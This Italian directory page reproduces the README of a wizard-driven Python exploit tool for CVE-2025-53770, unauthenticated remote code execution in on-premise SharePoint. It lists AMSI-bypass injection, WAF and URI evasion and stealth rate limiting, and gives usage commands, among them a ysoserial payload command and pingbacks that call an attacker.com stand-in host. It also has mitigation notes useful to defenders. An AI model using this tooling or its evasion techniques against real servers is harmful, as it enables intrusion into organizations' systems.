Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-53770 — Uno strumento di exploit Python sofisticato e guidato da procedura guidata che sfrutta CVE-2025-53770, una vulnerabilità critica (CVSS 9.8) di esecuzione remota di codice non autenticata in Microsoft SharePoint Server on-premise (2016, 2019, Subscription Edition) | Kitploit
Strumenti/GitHubGitHub/exfil0/cve-2025-53770
Escalation di PrivilegiRicognizioneGenerazione di PayloadAnalisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and Control
GitHubexfil0/cve-2025-53770
5121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-53770

Uno strumento di exploit Python sofisticato e guidato da procedura guidata che sfrutta CVE-2025-53770, una vulnerabilità critica (CVSS 9.8) di esecuzione remota di codice non autenticata in Microsoft SharePoint Server on-premise (2016, 2019, Subscription Edition)

Vedi Repository

Divine Absolute - Strumento di Exploit per CVE-2025-53770

License
Python

Panoramica

Divine Absolute è un sofisticato strumento di exploit Python guidato da wizard che mira a CVE-2025-53770, una vulnerabilità critica (CVSS 9.8) di esecuzione di codice in remoto (RCE) non autenticata in Microsoft SharePoint Server on-premises (2016, 2019, Subscription Edition). Questa vulnerabilità, divulgata come zero-day il 19 luglio 2025, deriva dalla deserializzazione di dati non attendibili in /_layouts/15/ToolPane.aspx. Lo strumento è progettato esclusivamente per test di penetrazione etici e ricerche di sicurezza autorizzate, offrendo una precisione, furtività e adattabilità senza pari per ricognizione, sfruttamento e verifica.

Repository: https://github.com/exfil0/CVE-2025-53770

⚠️ Avviso Legale: Questo strumento è destinato solo a uso lecito e autorizzato in ambienti controllati con esplicito permesso. L'uso non autorizzato contro sistemi di cui non si possiede o non si ha il permesso di testare è illegale e può comportare gravi conseguenze legali. L'autore non si assume alcuna responsabilità per usi impropri.

Caratteristiche

  • Modalità:
    • Recon: Rileva la presenza di SharePoint, la versione e l'accessibilità di ToolPane.aspx con punteggio avanzato e regex (es. 16.0.0.\d+-\w+?).
    • Exploit: Consegna payload tramite ToolPane.aspx con robusti bypass.
    • Full: Combina ricognizione e sfruttamento, con opzione di sfruttamento aggressivo.
  • Generazione Payload:
    • Integra ysoserial.net per payload di deserializzazione .NET (es. ObjectDataProvider, LosFormatter).
    • pythonnet opzionale per payload di fallback HTTP/DNS pingback (es. WebRequest.Create, Dns.GetHostEntry).
    • Supporta la compressione GZIP con codifica/decodifica esplicita e validazione base64.
    • Inietta bypass AMSI (riflessione base, offuscato o snippet personalizzato) nei comandi PowerShell, inclusi payload codificati in base64 (-enc).
  • Bypass:
    • Evasione URI: Suffissi casuali o fissi (es. /xp.aspx, basati su UUID).
    • Spoofing Referer: Nessuno, domini esterni (es. www.google.com), URL personalizzati o percorsi interni di SharePoint (es. /_layouts/15/sharepoint.aspx).

Contesto di CVE-2025-53770

  • Vulnerabilità: RCE non autenticata tramite deserializzazione in /_layouts/15/ToolPane.aspx.
  • Affetti: SharePoint Server 2016, 2019, Subscription Edition (anche EOL 2010/2013 vulnerabili).
  • Non affetti: SharePoint Online (M365).
  • Sfruttata: Dal 18 luglio 2025 in campagne come "ToolShell" da attori sponsorizzati da stati (es. Linen Typhoon).
  • Patch: Le patch Microsoft (es. KB5002768, KB5002754) rilasciate il 19 luglio 2025 mitigano completamente. L'iscrizione CISA KEV impone la patch federale entro il 21 luglio 2025.
  • Mitigazioni: Applicare patch, ruotare le chiavi dopo la patch, abilitare AMSI/Defender (Modalità Completa), monitorare i POST a /ToolPane.aspx, usare regole WAF (es. Cloudflare).

Installazione

Prerequisiti

  • Python 3.8+
  • Dipendenze:
    root@kitploit:~
    pip install requests termcolor
    
  • Opzionale (per fallback serializzazione .NET):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • Scaricare da ysoserial.net releases.
    • Posizionare ysoserial.exe in un percorso noto (es. ./ysoserial.exe).
  • Mono/Wine (sistemi non Windows):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (tramite Homebrew)
    brew install mono
    
  • Laboratorio Docker (consigliato per test):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

Configurazione

  1. Clonare il repository:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Installare le dipendenze Python:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. Assicurarsi che ysoserial.exe sia accessibile o fornire il suo percorso durante l'esecuzione.
  4. (Opzionale) Verificare Mono/Wine per sistemi non Windows.

Utilizzo

Eseguire il wizard interattivo:

root@kitploit:~
python divine_absolute.py

Flusso di Lavoro

  1. Selezione Modalità:
    • Recon: Scansiona per presenza e versione di SharePoint.
    • Exploit: Invia payload a ToolPane.aspx.
    • Full: Ricognizione + exploit (modalità aggressiva opzionale).
  2. Inserimento Target:
    • URL singolo (es. https://sharepoint.example.com).
    • File con URL (uno per riga).
  3. Configurazione Payload:
    • ysoserial.net: Specificare percorso, gadget (es. ObjectDataProvider) e comando (es. cmd /c whoami).
    • File: Caricare payload GZIP base64 da file.
    • Stringa: Inserire payload GZIP base64 direttamente.
    • Pingback: Generare pingback HTTP/DNS (es. http://attacker.com/callback o sub.attacker.com).
    • Bypass AMSI: Scegliere NONE, BASIC_REFLECTION, o snippet personalizzato.

Comandi di Esempio

  • Ricognizione:
    root@kitploit:~
    python divine_absolute.py
    # Selezionare: Mode=Recon, Target=https://sharepoint.example.com
    
  • Exploit con ysoserial.net:
    root@kitploit:~
    python divine_absolute.py
    # Selezionare: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • Modalità Full con Verifica:
    root@kitploit:~
    python divine_absolute.py
    # Selezionare: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • DNS Pingback:
    root@kitploit:~
    python divine_absolute.py
    # Selezionare: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

Output

I risultati vengono salvati in xanthorox_results.json con i campi:

  • target: URL testato.
  • sharepoint_detected: Booleano.
  • toolpane_accessible: Booleano.
  • exploited: Booleano (payload inviato).
  • verified_rce: Booleano/None (RCE confermata).
  • error: Eventuali errori incontrati.

Esempio:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Miglioramenti Affrontati

Questa versione corregge:

  • Limitazione Adattiva della Velocità: Ignora errori non di ripetizione (es. 404) per i conteggi di successo/errore; impone una soglia minima RPS (0.01).
  • Iniezione AMSI: Decodifica e inietta bypass nei comandi PowerShell codificati in base64 (-enc); supporta comandi non PowerShell (es. cmd.exe) con avvisi.
  • Fallback Pingback: Usa pythonnet per pingback DNS affidabile con Dns.GetHostEntry (sperimentale, richiede gadget per effetto completo).

Raccomandazioni per i Test

  • Configurazione Laboratorio: Usare un contenitore Docker di SharePoint Server 2019 (senza patch) per test sicuri.
  • Test WAF: Validare i bypass contro Cloudflare o WAF simili con RPS adattivo.
  • Test Payload: Generare payload con ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 e verificare i log DNS.

Limitazioni Note

  • Affidabilità Pingback: Dns.GetHostEntry in pythonnet potrebbe non attivarsi senza una specifica catena di gadget.
  • Comandi Complessi: Comandi PowerShell non standard potrebbero richiedere iniezione manuale del bypass AMSI.
  • Rilevamento WAF: Alcuni WAF potrebbero bloccare i payload nonostante i bypass; testare approfonditamente.

Contribuire

I contributi sono benvenuti! Si prega di:

  1. Forkare il repository.
  2. Creare un branch per le funzionalità (git checkout -b feature/miglioramento-fantastico).
  3. Committare le modifiche (git commit -m "Aggiunto miglioramento fantastico").
  4. Pushare sul branch (git push origin feature/miglioramento-fantastico).
  5. Aprire una pull request.

Licenza

Questo progetto è concesso in licenza secondo i termini della MIT License. Vedi LICENSE per i dettagli.

Riconoscimenti

  • xAI: Per aver ispirato ricerche di sicurezza all'avanguardia.
  • Team ysoserial.net: Per il generatore di payload di deserializzazione .NET.
  • Community di Sicurezza: Per approfondimenti sullo sfruttamento e le mitigazioni di CVE-2025-53770.

Contatti

  • Autore: @exfil0
  • Problemi: GitHub Issues
  • Telegram: https://t.me/GOTOCVE

Nota: Verificare sempre i payload e le configurazioni in un laboratorio controllato prima dell'uso. Rimanete etici, rimanete legali.

Scarica lo strumento
  • Furtività:
    • Limitazione adattiva della velocità con una soglia minima RPS (0.01) e controllo del burst.
    • Concorrenza thread-safe con pacing protetto da lock e jitter (0-0.1s).
  • Verifica:
    • Conferma robusta della RCE con regex OR compilate, tentativi su RequestException e codici di stato/percorsi personalizzabili.
  • Ricognizione:
    • Rilevamento migliorato di SharePoint tramite header (es. MicrosoftSharePointTeamServices), percorsi (es. /versions.aspx) e regex.
  • Output:
    • Risultati JSON con log forensi per l'analisi.
  • Usabilità:
    • Wizard interattivo per configurazione semplice.
    • Supporto Mono/Wine per ysoserial.net su sistemi non Windows.
    • Supporto proxy (HTTP/SOCKS5) e timeout personalizzabili.
  • CONCAT_OBFUSCATED
  • Opzioni Bypass:
    • URI: NONE, FIXED (es. /xp.aspx), RANDOM (basato su UUID).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  • Impostazioni di Rete:
    • Proxy (es. http://127.0.0.1:8080).
    • Thread, timeout, jitter e limite di velocità (RPS).
  • Verifica RCE:
    • Specificare percorso (es. /sitepages/result.txt), regex (es. Xanthorox.*), codici di stato (es. 200,403), tentativi, ritardo e timeout.